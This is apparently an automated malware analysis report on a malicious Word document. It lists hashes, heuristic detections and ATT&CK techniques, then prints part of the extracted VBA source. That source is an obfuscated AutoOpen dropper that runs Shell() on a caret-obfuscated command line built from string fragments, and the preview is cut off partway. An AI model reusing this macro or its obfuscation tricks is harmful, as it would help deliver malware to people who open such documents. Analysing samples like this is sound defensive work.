Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95aebc324fe3a164…

MALICIOUS

Office (OLE)

Size: 124.5 KB
Created: 2018-06-04 13:38:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: ca61c528aab8c72513e37dd2c38fafed
SHA-1: 4b0790b45d94353c7917463412110e190044260f
SHA-256: 95aebc324fe3a1647a8a17265c015d866f89f5fd7d0aa8bf38717ff444c75ecf
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Office document containing a VBA macro. The macro calls the Shell() function, a critical indicator of malicious activity because it launches an external command. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. An Autoopen macro is present, so the code runs as soon as the document is opened. The primary purpose of the macro appears to be launching a secondary payload, hence the 'Malicious File' technique.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6573347-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6573347-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  19641 bytes
             SHA-256: d64ca4386ae4fca148aa4eb4ebdb4239b6d8895dae4ae67e454579f5902fac66
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "RpnkwILZdifQsR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pFwZcm()
On Error Resume Next
For tSTQSA = sqhaX To 88141
         aXlfo = (BrHACu - ChrW(26730 * 91625) * koBFbM * CInt(njicrW + Sqr(80365)) + 15249 - 59768 / 63385 - CDate(AcXcmT - 42407 + 71017 - Hex(LSNYm / 10879)) + (GsYSS * Tan(skEzMI)))
Next
For BzVVNN = FHCij To 82123
         WUSKp = (HjPGOO - ChrW(11682 * 68592) * XoHNFA * CInt(wsKZm + Sqr(18409)) + 97354 - 80006 / 81825 - CDate(bkWPmn - 43605 + 44054 - Hex(RjPGw / 13907)) + (SjNbVk * Tan(KYazQ)))
Next
pFwZcm = bzsuhL + Shell(cmPUjSsqflo + Chr(LSiODQb + vbKeyC + UPUpZDubGz) + UtMOnIMWsZw + pRmWNkHjim + iEBkmSb + IfjzzIMcr + tPBDpVi + jifflOKJ + XuXjwr + cCaGlzhKwt, XQtCAH + 0 + NNPwZKl)
For zkZPfn = MXlBk To 82177
         ibhlMR = (rObPN - ChrW(81758 * 50688) * rLnGY * CInt(hJzbLl + Sqr(43483)) + 89987 - 95783 / 23247 - CDate(fDbiro - 75199 + 97669 - Hex(GVwASw / 91271)) + (jaNiS * Tan(BShKA)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For jwRPYi = wiAXAH To 54722
         LLzIO = (WOXwMM - ChrW(91652 * 50503) * JimSO * CInt(EibkJ + Sqr(93486)) + 42514 - 61202 / 6045 - CDate(XqnqG - 65716 + 3264 - Hex(qKhtRM / 41858)) + (YNqsOo * Tan(JGdXY)))
Next
pFwZcm
For tAiUl = WHkKbc To 99533
         EcLROO = (YIoKw - ChrW(65916 * 55181) * jdKdhz * CInt(zZjXz + Sqr(69000)) + 77687 - 6637 / 30054 - CDate(ONIju - 23170 + 17120 - Hex(nVrtK / 73975)) + (tdAjQ * Tan(Siudmk)))
Next
End Sub


Attribute VB_Name = "OhjFZtjVTzoRB"
Function UtMOnIMWsZw()
On Error Resume Next
For HkYWo = JBapt To 98056
         NzdLJ = (LnjXC - ChrW(11301 * 35809) * imiXj * CInt(aHLCZ + Sqr(32902)) + 83606 - 59753 / 76458 - CDate(uiqqin - 34598 + 45937 - Hex(tzSaNW / 32024)) + (AiPwR * Tan(wiFob)))
Next
jXEfAwGzfLl = "md wadJ" + "slif UIVQQPTBzF" + "hZCqsq" + "thnobPU Ljh"
For sajzwc = PborU To 12623
         mCHhzf = (vrAXo - ChrW(56161 * 40760) * Mdwqlt * CInt(SSikC + Sqr(2545)) + 88501 - 23078 / 75591 - CDate(phatWY - 81988 + 92059 - Hex(zjjbIz / 97900)) + (PLsdV * Tan(TjpCMc)))
Next
cdfCLr = "ckrsvP" + "ukc &     %^" + "c^o^" + "m^S^p^E" + "^c^" + "%    " + " %^c^o^m^S^p^" + "E^c^%    " + " /V    " + "     "
For BfNcw = vAqEIu To 13492
         jmrWlD = (iAuSUq - ChrW(12122 * 19503) * VdTXwE * CInt(zJDDV + Sqr(48912)) + 12652 - 70638 / 66509 - CDate(ukzzj - 52308 + 47993 - Hex(WiSKdF / 78351)) + (Iiibjz * Tan(TsMizK)))
Next
ApsiT = "/c       " + "    set %RtoZ" + "mzqkiU" + "XnQCr%=s"
For uJjGv = MjpCu To 92255
         aApfz = (fQXGG - ChrW(58528 * 90189) * iFTsZ * CInt(RkIaX + Sqr(19784)) + 36694 - 55784 / 49280 - CDate(bhnZES - 6202 + 63815 - Hex(kfoWDc / 53260)) + (PidVJ * Tan(fIqsO)))
Next
OjVGtwtu = "zs" + "sBhE&&set %nlMS" + "WCmTiEjR" + "%=p&&set %qPQh" + "iUwjBnpVZ%=o^w"
For mwCqd = ZqVBLC To 74369
         olcNF = (wJDuvY - ChrW(34566 * 23788) * ROZoZ * CInt(oczsZD + Sqr(71461)) + 60937 - 27989 / 43698 - CDate(iCjtfc - 75060 + 32167 - Hex(dsIuF / 23990)) + (hDmmN * Tan(IzJfU)))
Next
jCCNHIQwSOo = "&&set %f" + "mZNOoiNHGP" + "ZAtO%=iZ" + "jzqMt&&" + "set %sSvmSG" + "NF" + "nkdX%=!%nl" + "MSWCmTiEjR%" + "!&&set %LizsC" + "RCrbjoI"
For uLdoXU = PfOmlm To 46157
         VvUCn = (qDcbk - ChrW(26201 * 41039) * hkAHGW * CInt(zEkaP + Sqr(94966)) + 64404 - 36810 / 33016 - CDate(zpznD - 78394 + 54875 - Hex(TEHBMm / 13506)) + (Uwimi * Tan(BNVrjc)))
Next
SEqHR = "mMj%=" + "wEHPhAcr" + "Hdv&" + "&set %wDaz" + "oditbPJ" + "wb%=e^r&" + "&set" + " %VdaH" + "drNAQpU%=!"
UtMOnIMWsZw = jXEfAwGzfLl + cdfCLr + ApsiT + OjVGtwtu + jCCNHIQwSOo + SEqHR
End Function
Function pRmWNkHjim()
On Error Resume Next
For PIkLb = XWHdvX To 51306
         SszrzT = (cjoiWT - ChrW(76898 * 72626) * LFAIE * CInt(XqlBjw + Sqr(26278)) + 39427 - 65998 / 28390 - CDate(sjUXA - 73066 + 17649 - Hex(mZvjES / 69163)) + (pSqXRi * Tan(UHFwk)))
Next
zCwblW = "%qPQhiUw" + "jBnpV
... (truncated)